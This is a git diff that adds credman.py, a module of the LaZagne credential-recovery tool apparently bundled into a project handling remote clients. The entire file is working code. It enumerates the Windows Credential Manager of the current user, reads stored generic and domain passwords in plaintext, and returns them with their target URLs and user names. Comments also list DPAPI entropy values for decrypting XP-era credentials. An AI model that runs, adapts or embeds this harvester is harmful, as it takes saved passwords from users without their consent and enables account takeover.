diff options
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/windows/credman.py')
| -rw-r--r-- | foreign/client_handling/lazagne/softwares/windows/credman.py | 34 |
1 files changed, 34 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/windows/credman.py b/foreign/client_handling/lazagne/softwares/windows/credman.py new file mode 100644 index 0000000..309a125 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/windows/credman.py @@ -0,0 +1,34 @@ +# -*- coding: utf-8 -*- +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import * + + +class Credman(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'credman', 'windows', only_from_current_user=True) + + def run(self): + pwd_found = [] + # FOR XP + # - password are encrypted with specific salt depending on its Type + # entropy = 'abe2869f-9b47-4cd9-a358-c22904dba7f7\\0' # FOR CRED_TYPE_GENERIC + # entropy = '82BD0E67-9FEA-4748-8672-D5EFE5B779B0\\0' # FOR CRED_TYPE_DOMAIN_VISIBLE_PASSWORD + # CryptUnprotectData(byref(blobIn),None,byref(blobEntropy),None,None,CRYPTPROTECT_UI_FORBIDDEN,byref(blobOut)) + + creds = POINTER(PCREDENTIAL)() + count = c_ulong() + + if CredEnumerate(None, 0, byref(count), byref(creds)) == 1: + for i in range(count.value): + c = creds[i].contents + if c.Type == CRED_TYPE_GENERIC or c.Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: + # Remove password too long + if c.CredentialBlobSize.real < 200: + pwd_found.append({ + 'URL': c.TargetName, + 'Login': c.UserName, + 'Password': c.CredentialBlob[:c.CredentialBlobSize.real] # \\x00 could be deleted + }) + + CredFree(creds) + return pwd_found |